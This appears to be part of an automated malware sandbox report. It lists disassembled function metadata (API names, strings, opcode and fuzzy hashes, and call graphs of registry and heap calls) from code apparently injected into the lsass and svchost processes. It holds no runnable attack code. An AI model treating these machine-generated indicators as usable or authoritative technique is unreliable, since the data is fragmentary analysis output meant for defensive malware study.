                                                              • Instruction ID: 539d7fa312dabe0a02a4a36991552fccd56336bf33b53f387f86ad28829e058b
                                                              • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                              • Instruction Fuzzy Hash: 18319D22701B91C2FA14CF16A98C72DA7A0FB44B84F0A41279F9847B67EF35C4B98740
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: Value$ErrorLast
                                                              • String ID:
                                                              • API String ID: 2506987500-0
                                                              • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                              • Instruction ID: c83c6b407707b4dbc6b3b7b82b2caed50328515e1eb0a43fe36386d7293909be
                                                              • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                              • Instruction Fuzzy Hash: 0A1163203013C0C6FE68A73555DD72D6242AB987F4F164727EAB7477E7EE68C86A8700
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                              • String ID:
                                                              • API String ID: 517849248-0
                                                              • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                              • Instruction ID: c1f12f185a365d98643c548e91b1e72bf4effc7dbd05845da70183f29bcaf82d
                                                              • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                              • Instruction Fuzzy Hash: DD010532301B80C2FA649B52A89C75963A9B788FC4F894137DF9A43766DE39C989C740
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                              • String ID:
                                                              • API String ID: 449555515-0
                                                              • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                              • Instruction ID: 164501a6415bffd66fe917e88f769ddc3ad1f1b40aa64bea97b79c9247d2f77e
                                                              • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                              • Instruction Fuzzy Hash: B5012DB6611B40C2FB249B21E88C71E73A4BB45B86F154527CF9907766EF3EC55C8704
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                              • String ID: csm$f
                                                              • API String ID: 2395640692-629598281
                                                              • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                              • Instruction ID: 4b0a6f3e062a47a2f3e77ad4f28d0830188973ba44af3f5408a27d7634b4296d
                                                              • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                              • Instruction Fuzzy Hash: 6751BF32201B81CAFB94CF15E88CB5D3795F344B88F528227DBA64774AEB35C859C708
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: CombinePath
                                                              • String ID: \\.\pipe\
                                                              • API String ID: 3422762182-91387939
                                                              • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                              • Instruction ID: 748eaec06fdd8304175141e91d7fcb10eea3299cf276c1654e8c92baf0a6311d
                                                              • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                              • Instruction Fuzzy Hash: 6DF01C66718B84C2FA148B53B99C11D6665AB48FD0F0A9233EF5A4BB2ADF3DC45D8700
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                              • String ID: CorExitProcess$mscoree.dll
                                                              • API String ID: 4061214504-1276376045
                                                              • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                              • Instruction ID: b1dae043e590163143f4e82ec39ab210fa29368e4bf0a17308b2a9fdf74dbffb
                                                              • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                              • Instruction Fuzzy Hash: 65F06262211B45C1FB108B24E8CC35E6360EB88765F55021BCB6A452F6DF3DC55C8700
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: CurrentThread
                                                              • String ID:
                                                              • API String ID: 2882836952-0
                                                              • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                              • Instruction ID: cdd9b78ec5eaf04cb1b2f14923f4cedba8257b9bf05445ea44050982a578b50b
                                                              • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                              • Instruction Fuzzy Hash: 6C02A432219B84C6EB60CB55F49875EB7A1F384794F110117EBDE87BAADB78C498CB00
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: CurrentThread
                                                              • String ID:
                                                              • API String ID: 2882836952-0
                                                              • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                              • Instruction ID: 76b413ec14e38a6ac9e88e25468b0616ac705ba1cdb0ca70ff7d6d8fad0dbab9
                                                              • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                              • Instruction Fuzzy Hash: 6061B676619B80C6F660CB15F48871E77A0F388794F110517EBDE47BAADB78C968CB40
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: _set_statfp
                                                              • String ID:
                                                              • API String ID: 1156100317-0
                                                              • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                              • Instruction ID: aadaf6c08f9748136de9f6cbceaa287ca2a5a32013c1ebda6f4ef6558c209bf0
                                                              • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                              • Instruction Fuzzy Hash: EE119E23A10B54A9F7641568E8DE36D11406B683F8F0A0727AB76076EB8B2AC8CD424C
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077444677.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ab0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: _set_statfp
                                                              • String ID:
                                                              • API String ID: 1156100317-0
                                                              • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                              • Instruction ID: 2438009d4eccd0bfdc5c9a2303f4341fa76b055f83bc79e43529a95e1e4287f6
                                                              • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                              • Instruction Fuzzy Hash: 5B112533A5CF09C9FAA42128E4CE37D10D07B59370F4B863BAB76163E7CA6AC84C4201
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077444677.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ab0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                              • API String ID: 3215553584-4202648911
                                                              • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                              • Instruction ID: 26cf979074d90fcf05d85e544fcdcf7579b7cc95cef60043f929738aa5a5c4dc
                                                              • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                              • Instruction Fuzzy Hash: F2610536600760C6FA69DB69E5CC76E6AA0F789780F5B8917CB0A177A7DB34C84DC300
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: CallEncodePointerTranslator
                                                              • String ID: MOC$RCC
                                                              • API String ID: 3544855599-2084237596
                                                              • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                              • Instruction ID: 558256b13703980bb35bc78ab76fb44dce15fdc78b8fdb1fb2b32ce49efec02f
                                                              • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                              • Instruction Fuzzy Hash: 36614832600B84CAFB20DF65D48839D77A0F399B88F154217EF9917B9ADB78D5A9C700
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                              • String ID: csm$csm
                                                              • API String ID: 3896166516-3733052814
                                                              • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                              • Instruction ID: 97304d35c4b486749e002e92b9cf81982149fd581c5d11b448b14438c7f928ed
                                                              • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                              • Instruction Fuzzy Hash: 44514C721007C0CAFB648B2595CC35D77A0F766B95F1A4217DBE947B96CB38E4A9CB00
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077444677.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ab0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                              • String ID: csm$csm
                                                              • API String ID: 3896166516-3733052814
                                                              • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                              • Instruction ID: 19c43cd71e60161d93812c77d0e4ac8737510cff6eeb5711627b4654a467fa8f
                                                              • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                              • Instruction Fuzzy Hash: 44516D36104780CAFB748B25959C39C7BA0F365B94F1A8217DB998BBD7CB39D499C700
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077444677.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ab0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: CurrentImageNonwritable__except_validate_context_record
                                                              • String ID: csm$f
                                                              • API String ID: 3242871069-629598281
                                                              • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                              • Instruction ID: 8446a618bbd1140fecb175adc7a255fff733e8375c6260d7fd1f59283cc66251
                                                              • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                              • Instruction Fuzzy Hash: 1151AB32601700CAFB29CF29E48CB5D3795F354B98F568227DB164378AEB35D889C704
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077444677.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ab0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: CurrentImageNonwritable__except_validate_context_record
                                                              • String ID: csm$f
                                                              • API String ID: 3242871069-629598281
                                                              • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                              • Instruction ID: 90803dd6b9b29f9c4154e969358d487dae67566bd5ce1f620f43925fcc542657
                                                              • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                              • Instruction Fuzzy Hash: 7F316A32201740D6FB299F29E88C75D7BA4F340B98F168117AF5A07786DB39C948C704
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: FileWrite$ConsoleErrorLastOutput
                                                              • String ID:
                                                              • API String ID: 2718003287-0
                                                              • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                              • Instruction ID: 5415e984cde6a1f954e745032577872c235aef40fdbcb0d3a10d64624b9653db
                                                              • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                              • Instruction Fuzzy Hash: 99D1BC73B14B80C9F721CFA9D48829C3BA1F354B98F158217CF5A97B9ADA39C54AC740
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$Free
                                                              • String ID:
                                                              • API String ID: 3168794593-0
                                                              • Opcode ID: ccd79a5c24cc2b6b77d5d0d776de3086a7ca9ca8278a44c8c605b81f59301eca
                                                              • Instruction ID: e1a4700da16e8d3ef1b17da53b22238d79ed5d8b917823312ea25b365b8a4f34
                                                              • Opcode Fuzzy Hash: ccd79a5c24cc2b6b77d5d0d776de3086a7ca9ca8278a44c8c605b81f59301eca
                                                              • Instruction Fuzzy Hash: 1E117977500B90C6F714DF62A88C14DB7A4F788F81F0A4127EB4903766DE39C0598744
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: ConsoleErrorLastMode
                                                              • String ID:
                                                              • API String ID: 953036326-0
                                                              • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                              • Instruction ID: 7750c07c3da3ab5777ee1fb19e88fe5ee8ba8c540cdc789170c23b37d6888931
                                                              • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                              • Instruction Fuzzy Hash: D9918A73610B50C9FB61DF6594CC7AD2BA0B744B88F56410BDF4A67A96DB3AC88BC700
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                              • String ID:
                                                              • API String ID: 2933794660-0
                                                              • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                              • Instruction ID: c1e121f40b66a15715f8d269b70c98ee374ca54bb48e74cdb6f3174d14493375
                                                              • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                              • Instruction Fuzzy Hash: 34111C22710B01C9FB00CB60E8983AC33A4F719B58F450E22DB6D467A5DB78C5988380
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077444677.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ab0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: CallTranslator
                                                              • String ID: MOC$RCC
                                                              • API String ID: 3163161869-2084237596
                                                              • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                              • Instruction ID: f3028f0bacb26f4c6116040a1e45f79bacc9d5a175de68b6d573a429fff7c7f3
                                                              • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                              • Instruction Fuzzy Hash: B7614532A00B84CAFB24DF65D4883AD77A0F748B98F154217EF4917B9ADB38D599C704
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: FileType
                                                              • String ID: \\.\pipe\
                                                              • API String ID: 3081899298-91387939
                                                              • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                              • Instruction ID: 3514571e2c1d6cd3889b28a5e79674fb4b07f5075b2e224e86b20f94a4d05b12
                                                              • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                              • Instruction Fuzzy Hash: 2B5180322087C1C1F6649B29A5DC3BEA791F385B80F560127DFEA03B9BDA39C52D8750
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastWrite
                                                              • String ID: U
                                                              • API String ID: 442123175-4171548499
                                                              • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                              • Instruction ID: b84669cd5d919c91a09ffca97e8587df6a0950af1a2baa035680203c31bd1311
                                                              • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                              • Instruction Fuzzy Hash: 93418E63614B80C6EB209F25E8883AEA7A0F798794F524023EF4D87795EB39C44AC740
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFileHeaderRaise
                                                              • String ID: csm
                                                              • API String ID: 2573137834-1018135373
                                                              • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                              • Instruction ID: 149d407967b934cd8ed689359ce0485475af0033eaf3f8f7976efa754672e473
                                                              • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                              • Instruction Fuzzy Hash: 8F112B36214B8082EB618B15E48835D77E5F788B94F594222EFCC077A9DF3DC569CB04
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077444677.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ab0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: __std_exception_copy
                                                              • String ID: ierarchy Descriptor'$riptor at (
                                                              • API String ID: 592178966-758928094
                                                              • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                              • Instruction ID: 8da40ad284d153a9b89d1544e12ba7a913fe1935213764a8cba5128ad5ea2d85
                                                              • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                              • Instruction Fuzzy Hash: A1E08661641B44D0EF018F31E88829C33A4DB58B64F9A91239A5C06312FA38D1EDC300
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077444677.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ab0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: __std_exception_copy
                                                              • String ID: Locator'$riptor at (
                                                              • API String ID: 592178966-4215709766
                                                              • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                              • Instruction ID: 5205816057d34bf06f4ea810c880042c8f0231ff55e9ce8539c58bb0b426eeb2
                                                              • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                              • Instruction Fuzzy Hash: 30E08661601F44C0EF058F31D88419C73A4E758B54F8A9123DA4C06312EA38D1E9C300
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$AllocFree
                                                              • String ID:
                                                              • API String ID: 756756679-0
                                                              • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                              • Instruction ID: 0bfdd2f4f70d0c77588d297d632a834cc4e271defd7936f82574c36193d19b8d
                                                              • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                              • Instruction Fuzzy Hash: 6C119A26601B94C1FA44CB66A88C22D63A0FBC8FC0F1A412BDF8D83766DF39C45AC300
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: Heap$AllocProcess
                                                              • String ID:
                                                              • API String ID: 1617791916-0
                                                              • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                              • Instruction ID: 14bf7bafefd4b55b8bc325b1bb0149ce76066631eeb9ae1ebb85862f094286e6
                                                              • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                              • Instruction Fuzzy Hash: 48E03936601704C6FB048B62D84C34A36E5EB89B06F0681268B0907362DF7E8499C750

                                                              Execution Graph

                                                              Execution Coverage:0.7%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:73
                                                              Total number of Limit Nodes:2
                                                              execution_graph: node/edge list omitted (text residue of the rendered graph image). API calls named in the graph: GetProcessHeap, HeapFree, RegOpenKeyExW, RegCloseKey, RegQueryInfoKeyW, RegEnumValueW, StrCmpIW, StrCmpW, StrCpyW, lstrlenW, Sleep, SleepEx, LoadLibraryA, _invalid_parameter_noinfo.

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                              • String ID:
                                                              • API String ID: 1683269324-0
                                                              • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                              • Instruction ID: 077229c1eed964279b07ec97370b47b92095969d86f76acc536d4c6ada0caa5e
                                                              • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                              • Instruction Fuzzy Hash: DC11AD70F246408BFB60EB61F98DB6923ECA746F46F8C41249907A3691EF7CC04C8283

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 000002A661301628: GetProcessHeap.KERNEL32 ref: 000002A661301633
                                                                • Part of subcall function 000002A661301628: HeapAlloc.KERNEL32 ref: 000002A661301642
                                                                • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A6613016B2
                                                                • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A6613016DF
                                                                • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A6613016F9
                                                                • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A661301719
                                                                • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A661301734
                                                                • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A661301754
                                                                • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A66130176F
                                                                • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A66130178F
                                                                • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A6613017AA
                                                                • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A6613017CA
                                                              • Sleep.KERNEL32 ref: 000002A661301AD7
                                                              • SleepEx.KERNELBASE ref: 000002A661301ADD
                                                                • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A6613017E5
                                                                • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A661301805
                                                                • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A661301820
                                                                • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A661301840
                                                                • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A66130185B
                                                                • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A66130187B
                                                                • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A661301896
